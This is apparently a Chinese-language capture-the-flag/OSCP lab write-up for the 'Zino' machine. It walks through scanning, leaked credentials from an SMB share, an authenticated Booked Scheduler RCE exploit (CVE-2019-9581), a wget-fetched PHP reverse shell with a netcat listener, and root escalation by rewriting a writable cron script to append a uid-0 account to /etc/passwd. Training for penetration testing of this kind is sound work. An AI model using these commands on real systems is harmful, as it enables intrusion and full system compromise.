OSCP靶场–Zino
考点(CVE-2019-9581 RCE + 定时任务脚本可写提权)
1.nmap扫描
##┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.173.64 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-10 04:18 EDT
Nmap scan report for 192.168.173.64
Host is up (0.23s latency).
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 b2:66:75:50:1b:18:f5:e9:9f:db:2c:d4:e3:95:7a:44 (RSA)
| 256 91:2d:26:f1:ba:af:d1:8b:69:8f:81:4a:32:af:9c:77 (ECDSA)
|_ 256 ec:6f:df:8b:ce:19:13:8a:52:57:3e:72:a3:14:6f:40 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open mysql?
| fingerprint-strings:
| DNSStatusRequestTCP, HTTPOptions, JavaRMI, NULL, giop:
|_ Host '192.168.45.250' is not allowed to connect to this MariaDB server
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
8003/tcp open http Apache httpd 2.4.38
|_http-title: Index of /
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2019-02-05 21:02 booked/
|_
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.92%I=7%D=4/10%Time=66164BB0%P=x86_64-pc-linux-gnu%r(NU
SF:LL,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptio
SF:ns,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20al
SF:lowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatus
SF:RequestTCP,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20n
SF:ot\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(J
SF:avaRMI,4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x
SF:20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(giop,
SF:4D,"I\0\0\x01\xffj\x04Host\x20'192\.168\.45\.250'\x20is\x20not\x20allow
SF:ed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: Hosts: ZINO, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelHost script results:
|_clock-skew: mean: 1h20m00s, deviation: 2h18m36s, median: 0s
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-04-10T08:20:16
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.9.5-Debian)
| Computer name: zino
| NetBIOS computer name: ZINO\x00
| Domain name: \x00
| FQDN: zino
|_ System time: 2024-04-10T04:20:18-04:00Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 140.16 seconds2.user priv
##
┌──(root㉿kali)-[~/Desktop]
└─# smbmap -H 192.168.173.64 -u guest -p ""
[+] Guest session IP: 192.168.173.64:445 Name: 192.168.173.64 Disk Permissions Comment---- ----------- -------zino READ ONLY Logsprint$ NO ACCESS Printer DriversIPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)#####
## 下载文件查看有无敏感信息:
┌──(root㉿kali)-[~/Desktop/1]
└─# smbclient -N //192.168.173.64/zino/
smb: \> ls. D 0 Thu Jul 9 15:11:49 2020.. D 0 Tue Apr 28 09:38:53 2020.bash_history H 0 Tue Apr 28 11:35:28 2020error.log N 265 Tue Apr 28 10:07:32 2020.bash_logout H 220 Tue Apr 28 09:38:53 2020local.txt N 33 Wed Apr 10 04:18:07 2024.bashrc H 3526 Tue Apr 28 09:38:53 2020.gnupg DH 0 Tue Apr 28 10:17:02 2020.profile H 807 Tue Apr 28 09:38:53 2020misc.log N 424 Tue Apr 28 10:08:15 2020auth.log N 368 Tue Apr 28 10:07:54 2020access.log N 5464 Tue Apr 28 10:07:09 2020ftp D 0 Tue Apr 28 10:12:56 20207158264 blocks of size 1024. 4726348 blocks availablesmb: \> mget *###################
## misc.log发现:
Apr 28 08:39:01 zino systemd[1]: Set application username "admin"
Apr 28 08:39:01 zino systemd[1]: Set application password "adminadmin"###############
## auth.log
Apr 28 08:16:54 zino groupadd[1044]: new group: name=peter, GID=1001
Apr 28 08:16:54 zino useradd[1048]: new user: name=peter, UID=1001, GID=1001, home=/home/peter, shell=/bin/bash
Apr 28 08:17:01 zino passwd[1056]: pam_unix(passwd:chauthtok): password changed for peter##############################
## admin:adminadmin登陆成功:
http://192.168.173.64:8003/booked/Web/dashboard.php#################
##
┌──(root㉿kali)-[~/Desktop]
└─# searchsploit Booked scheduler
------------------------------------------------------------------------------------------------------------------------- ---------------------------------Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Booked Scheduler 2.7.5 - Remote Command Execution (Metasploit) | php/webapps/46486.rb
Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated) | php/webapps/50594.py
Booked Scheduler 2.7.7 - Authenticated Directory Traversal | php/webapps/48428.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results┌──(root㉿kali)-[~/Desktop]
└─# searchsploit -m php/webapps/50594.pyExploit: Booked Scheduler 2.7.5 - Remote Command Execution (RCE) (Authenticated)URL: https://www.exploit-db.com/exploits/50594Path: /usr/share/exploitdb/exploits/php/webapps/50594.pyCodes: CVE-2019-9581Verified: False
File Type: Python script, ASCII text executable
Copied to: /root/Desktop/50594.py###############
## 反弹shell:目标无法外联80端口
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 21
Serving HTTP on 0.0.0.0 port 21 (http://0.0.0.0:21/) ...
192.168.173.64 - - [10/Apr/2024 05:08:51] "GET /lrshell.php HTTP/1.1" 200 -┌──(root㉿kali)-[~/Desktop]
└─# python 50594.py http://192.168.173.64:8003 admin adminadmin
[+] Logged in successfully.
[+] Uploaded shell successfully
[+] http://192.168.173.64:8003/booked/Web/custom-favicon.php?cmd=$ pwd
/var/www/html/booked/Web$ wget http://192.168.45.250:21/lrshell.php## 浏览器:
## http://192.168.173.64:8003/booked/Web/lrshell.php
## 反弹:############
##
## webshell: http://pentestmonkey.net/tools/php-reverse-shell
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
listening on [any] 22 ...
192.168.173.64: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.64] 35904
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux05:09:09 up 53 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data## 提升shell:
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 22
listening on [any] 22 ...
192.168.173.64: inverse host lookup failed: Unknown host
connect to [192.168.45.250] from (UNKNOWN) [192.168.173.64] 35946
Linux zino 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux05:19:44 up 1:04, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color
www-data@zino:/$ ^Z
zsh: suspended nc -lvvp 22┌──(root㉿kali)-[~/Desktop]
└─# stty raw -echo;fg
[1] + continued nc -lvvp 22www-data@zino:/var/www$ cat /etc/passwd | grep -v nologin
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false####################
#3
3. root priv
###
##
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/3 * * * * root python /var/www/html/booked/cleanup.py#####
## 对定时任务脚本有修改权限:
www-data@zino:/tmp$ ls -al /var/www/html/booked/cleanup.py
-rwxrwxrwx 1 www-data www-data 164 Apr 28 2020 /var/www/html/booked/cleanup.py
www-data@zino:/tmp$ cat /var/www/html/booked/cleanup.py
#!/usr/bin/env python
import os
import sys
try:os.system('rm -r /var/www/html/booked/uploads/reservation/* ')
except:print 'ERROR...'
sys.exit(0)#############################
##
## 生成密码字符串加密值:
##
┌──(root㉿kali)-[~/Desktop]
└─# openssl passwd pass@123
$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1## 写入/etc/passwd
echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd### 修改脚本:
#!/usr/bin/env python
import os
import sys
try:os.system("echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd")
except:print 'ERROR...'
sys.exit(0)##################
##
www-data@zino:/tmp$ wget http://192.168.45.250:21/1.txt
--2024-04-10 05:33:20-- http://192.168.45.250:21/1.txt
Connecting to 192.168.45.250:21... connected.
HTTP request sent, awaiting response... 200 OK
Length: 203 [text/plain]
Saving to: ‘1.txt’1.txt 100%[===================>] 203 --.-KB/s in 0s 2024-04-10 05:33:21 (3.10 MB/s) - ‘1.txt’ saved [203/203]www-data@zino:/tmp$ cat 1.txt > /var/www/html/booked/cleanup.py
www-data@zino:/tmp$ cat /var/www/html/booked/cleanup.py
#!/usr/bin/env python
import os
import sys
try:os.system("echo 'root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash' >> /etc/passwd")
except:print 'ERROR...'
sys.exit(0)#######
www-data@zino:/tmp$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftp:x:107:116:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
root1:$1$0u9R34Oq$BL8AGWccOv95x6nX2A2bT1:0:0:root1:/root:/bin/bash
www-data@zino:/tmp$ su root1
Password:
root@zino:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@zino:/tmp# 
4.总结:
